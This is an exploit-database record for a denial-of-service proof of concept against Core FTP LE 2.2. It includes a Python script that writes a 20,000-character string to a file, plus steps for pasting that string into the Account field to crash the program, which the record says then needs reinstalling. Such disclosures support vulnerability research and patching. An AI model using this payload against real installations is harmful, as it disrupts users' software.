{"id": "EDB-ID:48137", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Core FTP LE 2.2 - Denial of Service (PoC)", "description": "", "published": "2020-02-26T00:00:00", "modified": "2020-02-26T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/48137", "reporter": "Ismael Nava", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-01-13T05:31:06", "viewCount": 72, "enchantments": {"dependencies": {}, "score": {"value": -0.2, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "sourceHref": "https://www.exploit-db.com/download/48137", "sourceData": "# Exploit Title: Core FTP LE 2.2 - Denial of Service (PoC)\r\n# Date: 2020-25-02\r\n# Exploit Author: Ismael Nava\r\n# Vendor Homepage: http://www.coreftp.com/\r\n# Software Link: http://www.coreftp.com/download.html\r\n# Version: 2.2 build 1947\r\n# Tested on: Windows 10 Home x64\r\n# CVE : n/a\r\n\r\n#STEPS\r\n# Open the program Core FTP LE\r\n# In File select the option Connect\r\n# Click in the option Advanced from the fiel Host / IP / URL\r\n# Run the python exploit script, it will create a new .txt files\r\n# Copy the content of the file \"Dog.txt\"\r\n# Paste the content in the field Account\r\n# Click in OK\r\n# After Core FTP lE closed, the program did not work again if the user try to\r\n# open again, so it is necessary uninstall and install again\r\n# End :)\r\n\r\n\r\nbuffer = 'R' * 20000\r\n\r\ntry: \r\n file = open(\"Dog.txt\",\"w\")\r\n file.write(buffer)\r\n file.close()\r\n\r\n print(\"Archive ready\")\r\nexcept:\r\n print(\"Archive no ready\")", "osvdbidlist": [], "exploitType": "dos", "verified": false, "_state": {"dependencies": 1645831042}}